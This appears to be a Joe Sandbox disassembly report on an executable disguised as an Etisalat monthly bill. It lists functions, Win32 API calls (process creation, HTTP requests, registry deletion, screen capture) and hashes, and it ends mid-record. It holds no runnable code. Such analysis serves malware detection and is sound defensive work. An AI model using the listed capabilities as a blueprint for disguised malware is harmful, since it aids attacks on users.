SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00905AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00905AC3
GetWindowRect.USER32(?,?), ref: 00905ACC
_wcslen.LIBCMT ref: 00905B33
SetWindowTextW.USER32(?,?), ref: 00905B6F
GetDesktopWindow.USER32 ref: 00905B75
GetWindowRect.USER32(00000000), ref: 00905B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00905BD3
GetClientRect.USER32(?,?), ref: 00905BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00905C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00905C2F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 191985f0f05c579e751c54f7cec22c32b62cd7a8d1490c8a5a9ee4a56b801ef4
Instruction ID: ca82b88b39cdc57ed4caa71a813711121edc8be37b4f45c0bbe9a310a6d047f9
Opcode Fuzzy Hash: 191985f0f05c579e751c54f7cec22c32b62cd7a8d1490c8a5a9ee4a56b801ef4
Instruction Fuzzy Hash: 7D714C71900B09AFDB20DFA8CE86A6FBBF9FF48704F114918E582A25A0D775E944DF50

Function 008C00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 008C00C6

Part of subcall function 008C00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0097070C,00000FA0,2BAD62E9,?,?,?,?,008E23B3,000000FF), ref: 008C011C
Part of subcall function 008C00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008E23B3,000000FF), ref: 008C0127
Part of subcall function 008C00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008E23B3,000000FF), ref: 008C0138
Part of subcall function 008C00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 008C014E
Part of subcall function 008C00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008C015C
Part of subcall function 008C00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008C016A
Part of subcall function 008C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008C0195
Part of subcall function 008C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008C01A0

___scrt_fastfail.LIBCMT ref: 008C00E7

Part of subcall function 008C00A3: __onexit.LIBCMT ref: 008C00A9

Strings

InitializeConditionVariable, xrefs: 008C0148
kernel32.dll, xrefs: 008C0133
SleepConditionVariableCS, xrefs: 008C0154
WakeAllConditionVariable, xrefs: 008C0162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 008C0122

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: d44b689a817eb958263607dc5ac06c9f089b37bee00871697b5f27ce2ad0ed03
Instruction ID: 14da982dc87a75ac3ce5ea750152059ec8e6903e70d547cfd0de265ddc43e462
Opcode Fuzzy Hash: d44b689a817eb958263607dc5ac06c9f089b37bee00871697b5f27ce2ad0ed03
Instruction Fuzzy Hash: 6B212572A1CB00EBD7105BA4AC09F6A73B4FB84B94F04412EF815E6291DBB0D8009E91

Function 009030F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0090318D
_wcslen.LIBCMT ref: 009031F8

Strings

CLASS, xrefs: 00903188, 009031A5
TEXT, xrefs: 0090347C
CLASSNN, xrefs: 009031F3, 00903204
INSTANCE, xrefs: 00903453
NAME, xrefs: 00903335, 00903346
REGEXPCLASS, xrefs: 00903255, 00903266

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: b48741d94e366c576890d92ffcb355c26d3efdce9fa799a66798af1562cffa71
Instruction ID: 10485af5f4885f7364a5942e46447dcfcb04b0f88cef54bac9e0f71d442b8800
Opcode Fuzzy Hash: b48741d94e366c576890d92ffcb355c26d3efdce9fa799a66798af1562cffa71
Instruction Fuzzy Hash: 16E1D432A00616AECB289F78C851BEDBBBCFF44710F54C529E456E7290DB30AE858790

Function 009144C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0093CC08), ref: 00914527
_wcslen.LIBCMT ref: 0091453B
_wcslen.LIBCMT ref: 00914599
_wcslen.LIBCMT ref: 009145F4
_wcslen.LIBCMT ref: 0091463F
_wcslen.LIBCMT ref: 009146A7

Part of subcall function 008BF9F2: _wcslen.LIBCMT ref: 008BF9FD

GetDriveTypeW.KERNEL32(?,00966BF0,00000061), ref: 00914743

Strings

cdrom, xrefs: 0091458F, 00914594
all, xrefs: 00914531, 00914536
removable, xrefs: 009145EA, 009145EF
ramdisk, xrefs: 009146F1
fixed, xrefs: 00914635, 0091463A
unknown, xrefs: 00914708
network, xrefs: 0091469D, 009146A2

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 41bf0226d023ab2c627be6837afc253343a520962a4e9bb93b0113f784380452
Instruction ID: 3cbc0f1b4c196c882a4904ec3dc3fcdfb525d7585a747fd0b0029df266250395
Opcode Fuzzy Hash: 41bf0226d023ab2c627be6837afc253343a520962a4e9bb93b0113f784380452
Instruction Fuzzy Hash: 71B1E2717083069FC710DF28C890AAAB7E9FFAA764F50492DF496C7291D730D984CB92

Function 0092AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0092B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0092B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0092B1D4
_wcslen.LIBCMT ref: 0092B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0092B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0092B236
_wcslen.LIBCMT ref: 0092B332

Part of subcall function 009105A7: GetStdHandle.KERNEL32(000000F6), ref: 009105C6

_wcslen.LIBCMT ref: 0092B34B
_wcslen.LIBCMT ref: 0092B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0092B3B6
GetLastError.KERNEL32(00000000), ref: 0092B407
CloseHandle.KERNEL32(?), ref: 0092B439
CloseHandle.KERNEL32(00000000), ref: 0092B44A
CloseHandle.KERNEL32(00000000), ref: 0092B45C
CloseHandle.KERNEL32(00000000), ref: 0092B46E
CloseHandle.KERNEL32(?), ref: 0092B4E3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 79b1299f9fe54518ce454e0cd5b4eccdcf536e538e25eff6b26a589894fb50d1
Instruction ID: 909ec3930dc56f7c57484b8b8358167d0e66c939e94a4d1ed047659cf2ad1540
Opcode Fuzzy Hash: 79b1299f9fe54518ce454e0cd5b4eccdcf536e538e25eff6b26a589894fb50d1
Instruction Fuzzy Hash: FEF188316083109FD714EF28D891B6ABBE5FF85310F18895DF8999B2A6DB31EC44CB52

Function 008A326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00971990), ref: 008E2F8D
GetMenuItemCount.USER32(00971990), ref: 008E303D
GetCursorPos.USER32(?), ref: 008E3081
SetForegroundWindow.USER32(00000000), ref: 008E308A
TrackPopupMenuEx.USER32(00971990,00000000,?,00000000,00000000,00000000), ref: 008E309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008E30A9

Strings

0, xrefs: 008A327D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: a763a520d5ab8ce616d4de0999d2ebfad24fc1ec39a4bf48a2ec5db637a3c597
Instruction ID: 96f8477d8c53f2ce27328181a8b2261dba6b50d36a21cc8f203acfe1b6c09ba6
Opcode Fuzzy Hash: a763a520d5ab8ce616d4de0999d2ebfad24fc1ec39a4bf48a2ec5db637a3c597
Instruction Fuzzy Hash: B3710771644255BEFB218F69CC49FAABF68FF06324F204216F514EA1E0CBB1AD50DB50

Function 00936CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00936DEB

Part of subcall function 008A6B57: _wcslen.LIBCMT ref: 008A6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00936E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00936E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00936E94
DestroyWindow.USER32(?), ref: 00936EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008A0000,00000000), ref: 00936EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00936EFD
GetDesktopWindow.USER32 ref: 00936F16
GetWindowRect.USER32(00000000), ref: 00936F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00936F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00936F4D

Part of subcall function 008B9944: GetWindowLongW.USER32(?,000000EB), ref: 008B9952

Strings

tooltips_class32, xrefs: 00936E58, 00936EDD
0, xrefs: 00936D98

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 294434ad6a92d63bd098daefd5468547977870124fc6d799380dc0c90c118d54
Instruction ID: f6cc8144ad9637c7ce7269c8a21301f744f81345e6741937fa9ad431adcf2857
Opcode Fuzzy Hash: 294434ad6a92d63bd098daefd5468547977870124fc6d799380dc0c90c118d54
Instruction Fuzzy Hash: DD717975108641AFDB21CF18DC44FAABBF9FB89304F04481DFA9997261C770A95ADF22

Function 0093911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008B9BB2

DragQueryPoint.SHELL32(?,?), ref: 00939147

Part of subcall function 00937674: ClientToScreen.USER32(?,?), ref: 0093769A
Part of subcall function 00937674: GetWindowRect.USER32(?,?), ref: 00937710
Part of subcall function 00937674: PtInRect.USER32(?,?,00938B89), ref: 00937720

SendMessageW.USER32(?,000000B0,?,?), ref: 009391B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009391BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009391DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00939225
SendMessageW.USER32(?,000000B0,?,?), ref: 0093923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00939255
SendMessageW.USER32(?,000000B1,?,?), ref: 00939277
DragFinish.SHELL32(?), ref: 0093927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00939371

Strings

@GUI_DRAGID, xrefs: 009392E9
@GUI_DROPID, xrefs: 0093929E
@GUI_DRAGFILE, xrefs: 00939320

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 6b74ccecddff645bbf9b01c5d91dbf53a1d4ae680e76962d2332b03b0c93ea82
Instruction ID: de8e7d52d05d5a3d55321b3e0270b0f1167d50c95cb6b9ed86dc2a02182d84ce
Opcode Fuzzy Hash: 6b74ccecddff645bbf9b01c5d91dbf53a1d4ae680e76962d2332b03b0c93ea82
Instruction Fuzzy Hash: E5618972108701AFD701EF64DC85EAFBBE9FF89750F00092EF595922A0DB709A49CB52

Function 0091C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0091C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0091C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0091C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0091C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0091C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0091C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0091C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0091C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0091C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0091C5F0
InternetCloseHandle.WININET(00000000), ref: 0091C5FB

Strings

, xrefs: 0091C575

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: c4aef8cdb775d7bea9aaaacfd20271a87cd6e6e1c15bbed737670ba0489f16fa
Instruction ID: 0a4d7a8f4d5104867f397daaa53c810d6b20607244b6487f0866486aed2d18c9
Opcode Fuzzy Hash: c4aef8cdb775d7bea9aaaacfd20271a87cd6e6e1c15bbed737670ba0489f16fa
Instruction Fuzzy Hash: AB513AF1644609BFEB218F64C988ABB7BBDFB08754F004419F946A6250DB34E984AF61

Function 0093856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00938592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009385A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009385AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009385BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009385C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009385D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009385E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009385E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 009385F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0093FC38,?), ref: 00938611
GlobalFree.KERNEL32(00000000), ref: 00938621
GetObjectW.GDI32(?,00000018,?), ref: 00938641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00938671
DeleteObject.GDI32(?), ref: 00938699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009386AF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 1be5b2c367ad4cc9eb8f94e3dd4a1dc578568e56900f9a8e0ef5775d8638901f
Instruction ID: 534f83bafaaeb773e3ced6f8d37d8b8da304c8b1f9d0529e08d2b0c19ff195f9
Opcode Fuzzy Hash: 1be5b2c367ad4cc9eb8f94e3dd4a1dc578568e56900f9a8e0ef5775d8638901f
Instruction Fuzzy Hash: EB4107B5614608AFDB119FA5CC89EAB7BBCEF89B15F108058F915E7260DB309D01EF60

Function 009114BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00911502
VariantCopy.OLEAUT32(?,?), ref: 0091150B
VariantClear.OLEAUT32(?), ref: 00911517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009115FB
VarR8FromDec.OLEAUT32(?,?), ref: 00911657
VariantInit.OLEAUT32(?), ref: 00911708
SysFreeString.OLEAUT32(?), ref: 0091178C
VariantClear.OLEAUT32(?), ref: 009117D8
VariantClear.OLEAUT32(?), ref: 009117E7
VariantInit.OLEAUT32(00000000), ref: 00911823

Strings

Default, xrefs: 009116AF
%4d%02d%02d%02d%02d%02d, xrefs: 00911625

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 883f76d526239f83b2685f74d632969bc0ad48c42579cd9b04c46dae4723df61
Instruction ID: 146da11885b49d013c3903e90c21bf83469f111dbc0fbcb4dee7f3c098c7e8c3
Opcode Fuzzy Hash: 883f76d526239f83b2685f74d632969bc0ad48c42579cd9b04c46dae4723df61
Instruction Fuzzy Hash: CAD11E71B00509EBDB109F68D884BF9B7BAFF45700F148456F646AB681DB34EC80DB62

Function 0092B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

Part of subcall function 0092C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0092B6AE,?,?), ref: 0092C9B5
Part of subcall function 0092C998: _wcslen.LIBCMT ref: 0092C9F1
Part of subcall function 0092C998: _wcslen.LIBCMT ref: 0092CA68
Part of subcall function 0092C998: _wcslen.LIBCMT ref: 0092CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0092B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0092B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0092B80A
RegCloseKey.ADVAPI32(?), ref: 0092B87E
RegCloseKey.ADVAPI32(?), ref: 0092B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0092B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0092B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0092B922
FreeLibrary.KERNEL32(00000000), ref: 0092B983
RegCloseKey.ADVAPI32(00000000), ref: 0092B994

Strings

RegDeleteKeyExW, xrefs: 0092B8FE
advapi32.dll, xrefs: 0092B8ED

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: d25c3dd8658bf4b0018413b605927aba9fd18c135da6ade45266315912fc84f5
Instruction ID: 4a402a72f3a6bc765c6d1ae32532f511b26d0305203506b237bd3d487cfad0d3
Opcode Fuzzy Hash: d25c3dd8658bf4b0018413b605927aba9fd18c135da6ade45266315912fc84f5
Instruction Fuzzy Hash: 80C1AD34208211AFD714DF18D495F2ABBE9FF85308F14845CF5AA8B6A2CB75EC45CB92

Function 0092255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009225D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009225E8
CreateCompatibleDC.GDI32(?), ref: 009225F4
SelectObject.GDI32(00000000,?), ref: 00922601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0092266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009226AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009226D0
SelectObject.GDI32(?,?), ref: 009226D8
DeleteObject.GDI32(?), ref: 009226E1
DeleteDC.GDI32(?), ref: 009226E8
ReleaseDC.USER32(00000000,?), ref: 009226F3

Strings

(, xrefs: 0092268D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
